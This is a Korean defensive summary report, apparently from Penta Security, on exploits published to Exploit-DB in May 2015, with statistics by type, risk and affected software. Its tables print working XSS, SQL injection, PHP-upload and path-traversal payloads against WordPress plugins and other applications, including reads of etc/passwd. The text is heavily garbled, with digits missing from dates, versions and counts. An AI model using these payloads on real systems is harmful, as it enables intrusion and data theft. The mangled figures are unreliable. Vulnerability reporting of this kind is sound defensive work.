3708 하 중 Landing Pages Plugin post.php 3708 XSS 하 중 Landing Pages Plugin post-new.php 3707 하 중 NewStatPress Plugin admin.php 3707

Size: px

Start display at page:

Download "3708 하 중 Landing Pages Plugin post.php 3708 XSS 하 중 Landing Pages Plugin post-new.php 3707 하 중 NewStatPress Plugin admin.php 3707"

도진 성
7 years ago
Views:

1 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) EDB 분석보고서 (205.05) ~ Exploit-DB( 에공개된별로분류한정보입니다. 205 년 5 월에공개된 Exploit-DB 의분석결과, XSS (Cross Site Scripting) 공격에대한보고개수가가장많았습니다. 분석된 XSS 공격들은모두스크립트를파라미터에삽입하는단순한공격으로써, 기본적인입력값및특수문자를체크하였다면충분히막을수있는공격들이었습니다. 주요소프트웨어별발생현황을보면, 4 월과마찬가지로대표적인 CMS 인 에서가장많은이보고되었습니다. 사용자수가많고 Plugin 도다양하게제공되는 는그만큼해커들의주요공격대상이되므로 를사용하는관리자는항상최신의보안업데이트상태를유지하는것이필요합니다. 다음으로는 소프트웨어에서많은이보고되었습니다. 위험도가낮은들이발견되었지만 PHPMyAdmin 의 JSP 버전인 JSPMyadmin 역시사용자가많은소프트웨어이기때문에, 주기적인보안패치를실시하여공격위험을최소화할수있도록노력하여야하겠습니다.. 별보고개수 보고개수 XSS 7 5 LFI 3 File Upload 총합계 별보고개수 XSS LFI File Upload 총합계 2. 위험도별분류위험도 보고개수 백분율 상 4.% 중 % 하 % 합계 % 위험도별분류 4 상 중 공격난이도별현황공격난이도 보고개수 백분율 상 % 중 % 하 % 총합계 % 공격난이도별현황 3 중 하 주요소프트웨어별발생현황소프트웨어이름 SynTail Xeams Buddy Wing FTP Server Admin Pluck PHPCollab Chronosite 총합계 보고개수 주요소프트웨어별발생현황 5 20 SynTail Xeams Buddy Wing FTP Server Admin Pluck ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 XSS 하 중 Ultimate Product Catalogue admin.php XSS File Upload 하 상 Ultimate Product Catalogue admin.php File Upload 하 중 Freshmail Plugin <= post.php 하 중 Freshmail Unauthenticated - admin-ajax.php XSS 하 중 ClickBank Ads Plugin.7 - clickbank-ads.php XSS XSS 하 중 Ultimate Profile Builder Plugin admin.php XSS XSS 하 중 Yet Another Related Posts Plugin <= options-general.php XSS Booking Calendar Contact Form /wp-path/wp-admin/ 하중 Booking Calendar Contact Form admin-ajax.php 취약하중 점 하 중 Booking Calendar Contact Form /wp-path/ 중 상 Feed Plugin admin.php 하 중 WP Symposium Plugin 5. - / 373 Wordpess Simple Photo Gallery 중상 /index.php/wppg_photogallery/wppg_photo_details/ 372 XSS 하 중 church_admin Plugin /wordpress/index.php/205/05/2/church_admin-registration-form/ XSS 3709 하 중 GigPress Plugin gigpress.php

2 3708 하 중 Landing Pages Plugin post.php 3708 XSS 하 중 Landing Pages Plugin post-new.php 3707 하 중 NewStatPress Plugin admin.php 3707 XSS 하 중 NewStatPress Plugin admin.php XSS 3732 XSS 하 중 Plugin Free Counter. - admin-ajax.php XSS

3 EDB 분석보고서 (205.05) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 XSS 하중 Ultimate Product Catalogue admin.php XSS POST /wp-admin/admin.php?page=upcpoptions&action=upcp_editproduct&update_item=produc t&item_id=6 HTTP/. Chrome/ Safari/535.7 action=edit_product&_wp_http_referer=/wpadmin/admin.php?page=upcpoptions&action=upcp_editproduct&update_item=produc t&item_id=6&item_name=product name</a><script>alert('product Name says: '+document.cookie)</script><a>&item_slug=asdf&item_id =6&Item_Image= rice=666&item_description=product description says<script>alert('product description says: '+document.cookie)</script>&item_seo_description=seo desc&item_link=&item_display_status=show&category_i D=&SubCategory_ID= Ultimate Product Catalogue File Upload 하상 Ultimate Product Catalogue admin.php File Upload POST /wp-admin/admin.php?page=upcpoptions&action=upcp_addproductspreadsheet&displaypa ge=product HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.2; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary= dd f2 Ultimate Product Catalogue dd f2 Content-Disposition: form-data; name="uploadfile"; filename="cooldog.php" Content-Type: application/octet-stream <? phpinfo();?> dd f2-- POST /wp-admin/post.php HTTP/ 하중 Freshmail Plugin <= post.php Chrome/ Safari/535.7 Freshmail Plugin <=.5.8 content=[fm_form id='" and substr(user(),,)="b] POST wp-admin/admin-ajax.php HTTP/ 하중 Freshmail Unauthenticated - adminajax.php Chrome/ Safari/535.7 Freshmail <=3D.5.8 form%5b %5d=3dfake@fake.com&form%5bimie%5d =3Dasdf&fm_form_id=3D" and "a"=3d"a&action=3dfm_form&fm_form_referer=3d%2f XSS 하중 POST /wp/wp-admin/optionsgeneral.php?page=clickbank-ads-clickbankwidget/clickbank-ads.php HTTP/. ClickBank Ads Plugin.7 - clickbank-ads.php XSS 취약 Chrome/ Safari/535.7 점 ClickBank Ads Plugin.7 cbwec[title]=">>><script> alert(document.cookie)</script>

4 EDB 분석보고서 (205.05) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 XSS 하중 POST /wp/wp-admin/admin.php?page=ultimatepb_field HTTP/. Ultimate Profile Builder Plugin admin.php Chrome/ Safari/535.7 XSS field_name=<script>alert("")</script> Ultimate Profile Builder Plugin XSS 하중 Yet Another Related Posts Plugin <= optionsgeneral.php XSS POST /wp/wp-admin/admin.php?page=ultimatepb_field HTTP/. Chrome/ Safari/535.7 Yet Another Related Posts Plugin <= no_results=<script>alert();</script> XSS 하중 SynTail <=.5 Build /app XSS POST /app HTTP/. Chrome/ Safari/535.7 SynTail SynTail <=.5 Build 566 friendlyname=<script>alert("marlow")</script> XSS 하중 SynaMan <= 3.4 Build /app XSS /app?sharedname=%3cscript%3ealert%28%22xss%22 %29%3C%2Fscript%3E&selectedPath=C%3A\&publicR ead=&publicwrite=&operation=mngfolders&st=addfol der SynaMan SynaMan <= 3.4 Build XSS 하중 Syncrify Server <= 3.6 Build /app XSS /app?admin =%3cscript%3ealert%28victim%29% 3C%2Fscript%3E&smtpServer= &smtpPort=25&s mtpuser=%3cscript%3ealert%284%29%3c%2fscript% 3E&smtpPassword=admin&smtpSecurity=None&proceedB utton=save&operation=config&st=savesmtp Syncrify Syncrify Server <= 3.6 Build XSS 하중 Xeams <= 4.5 Build / XSS /FrontController?domainname=%3Cscript%3Ealert%28 %22XSS%22%29%3C%2Fscript%3E&operation=60 Xeams Xeams <= 4.5 Build LFI 하중 Buddy /sqlbuddy/ LFI /sqlbuddy/#page=../../../restricted/user_pwd.sql# Buddy Buddy XSS 하중 Wing FTP Server Admin <= /admin_loglist.html XSS /admin_loglist.html?domain=<script>alert();</script> Wing FTP Server Admin Wing FTP Server Admin <= LFI 하중 중상 LFI 하중 view_file.php LFI new_sidebar.php /www/view_file.php?action=download&file=../../../../../../ etc/passwd/ /www/new_sidebar.php?sbctg=lessons&new_lesson_id=n ull+union+select+password+from+users+where+id= /pluck- Pluck 4.7-4_7/data/modules/albums/albums_getimage.php?image= albums_getimage.php LFI \..\..\..\..\..\..\..\Windows\system.ini Pluck Pluck 하중 하중 PHPCollab deletetopics.php Booking Calendar Contact Form /wppath/wp-admin/ /phpcollab/topics/deletetopics.php?project=%27%20and %20%27a%27%3D%27a%27 /wp-path/wpadmin/?action=dex_bccf_check_posted_data&dex_bccf=l oadseasonprices&dex_item=%20union%20select%20nu ll,%20null PHPCollab PHPCollab 2.5 Booking Calendar Contact Form 하중 Booking Calendar Contact Form adminajax.php POST /wp-path/wp-admin/adminajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_ calendar_load2=delete HTTP/. Chrome/ Safari/535.7 Booking Calendar Contact Form.0.2 id='%20or%20sleep(00)# 하중 Booking Calendar Contact Form /wp-path/ POST /wppath/?action=dex_bccf_check_posted_data&dex_bccf=get cost HTTP/. Chrome/ Safari/535.7 Booking Calendar Contact Form.0.2 dex_item=%20union%20select%20null,%20null

5 EDB 분석보고서 (205.05) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 하중 Chronosite archives.php /cms/chronosite_52/archives.php?numero=%27%20and %20%27a%27%3D%27a%27 Chronosite Chronosite 중상 Feed Plugin admin.php /wpadmin/admin.php?page=feedwordpress/syndication.php& action=update Checked&link_ids[]=) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,CONCAT(0x76a6b6a7,0x ,0x )-- FeedWordPre ss Plugin 하중 중상 WP Symposium Plugin 5. - / Wordpess Simple Photo Gallery /index.php/wppg_photogallery/ wppg_photo_details/ /?page_id=4&cid=&show=%20and%20= /wordpress/index.php/wppg_photogallery/wppg_photo_d etails/?gallery_id= AND (SELECT * FROM (SELECT(SLEEP(5)))QBzh)&image_id=4 WP Symposium Plugin 5. Wordpess Simple Photo Gallery.7.8 POST /wordpress/index.php/205/05/2/church_adminregistration-form/ HTTP/. Chrome/ Safari/ XSS 하중 save=yes&church_admin_register=9d8cf0420&_wp_http _referer=%2fwordpress%2findex.php%2f205%2f05% church_admin Plugin 2F2%2Fchurch_admin-registrationform%2F&first_name%5B%5D=test&prefix%5B%5D=&l /wordpress/index.php/205/05/ ast_name%5b%5d=test&mobile%5b%5d=%2b3670&p 2/church_admin-registrationform/ XSS eople_type_id%5b%5d=& %5b%5d=test%40test. test&sex=male&phone=%2b3670&address=%3cscript %3Econfirm%28%29%3C%2Fscript%3E&lat= &lng= &recaptcha_challenge_field=03AHJ_Vuv BRBOVts65lchUe_H_cAuISniJ4rFDcaPyecjg- HypsHSZSfTkCyZMUC6PjVQAkkuFDfpnsKn28LU8wIMxb9n F5g7XnIYLt0qGzhXcgX4LSX5ul7tPX3RSdussMajZ- _NYQnOMJZj8b5e5LJgK68Gjf8aaILIyxKud2OF2bmzoZKa 56gtjBbzXBEGASVMMFJ59uB9FsoJIzVRyMJmaXbbrgM0 jnsseegthefo83fuzs9uuqrbqgqazgymmtwdgz4xvrzxudv5zc76 ktq-lwkpa&recaptcha_response_field=34 church_admin Plugin 하중 GigPress Plugin gigpress.php POST /wp-admin/admin.php?page=gigpress/gigpress.php HTTP/. Chrome/ Safari/535.7 GigPress Plugin _wpnonce=b3c92d92&_wp_http_referer=/wordpress/w p- admin/admin.php?page=gigpress/gigpress.php&gpaction =add&show_status=active&gp_mm=05&gp_dd=05&gp_y y=205&show_artist_id= and =&show_venue_id=&show_related=new 하중 Landing Pages Plugin post.php /wpadmin/post.php?post=306%20and%20=&action=edit &lp-variation-id=&ab-action=delete-variation Landing Pages Plugin XSS 하중 Landing Pages Plugin post-new.php /wp-admin/post-new.php?post_type=inboundforms&post='></iframe><script>alert(string.fromcharcode (88, 83, 83))</script> Landing Pages Plugin 하 중 XSS 하 중 NewStatPress Plugin admin.php NewStatPress Plugin admin.php XSS /wpadmin/admin.php?where=agent%20and%20'a'='a'&lim itquery=&searchsubmit=buscar&page=nsp_search /wpadmin/admin.php?where=<script>alert(string.fromcharc ode(88,+83,+83))</script>&searchsubmit=buscar&page=n sp_search NewStatPress Plugin NewStatPress Plugin XSS 하중 POST /wp-admin/admin-ajax.php HTTP/. Chrome/ Safari/535.7 Plugin Free Counter. - admin-ajax.php XSS Plugin Free Counter. action=check_stat&id_counter=<counter_id from step 2>&value_=<script>alert()</script> 하중 SPMyAdmin. - deletedata.jsp //deletedata.jsp?db=test&table= &field= CATID or 'field'='name'.

6 EDB 분석보고서 (205.05) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 XSS 하중 SPMyAdmin. - right.jsp XSS //right.jsp?server=localhost&db= "/><script>alert(666)</script> XSS 하중 SPMyAdmin. - tabledata.jsp XSS //tabledata.jsp?db= "/><script>alert(666);</script> XSS 하중 SPMyAdmin. - query.jsp XSS //query.jsp?server= "/><script>alert(666)</script>&db= XSS 하중 SPMyAdmin. - export.jsp XSS //export.jsp?db=test&table= <script>alert(666)</script>.

76 XSS 하 Huge-IT Slider admin.php XSS

76 XSS 하 Huge-IT Slider admin.php XSS 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) EDB 분석보고서 (05.06) 05.06.0~05.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 05 년 6 월에공개된 Exploit-DB 의분석결과, LFI 공격에대한보고개수가가장많았습니다. LFI 공격은대체적으로공격난이도는낮지만공격이성공했을경우시스템의주요파일들이노출되거나파일다운로드가가능해지기때문에위험도가높은공격으로분류됩니다.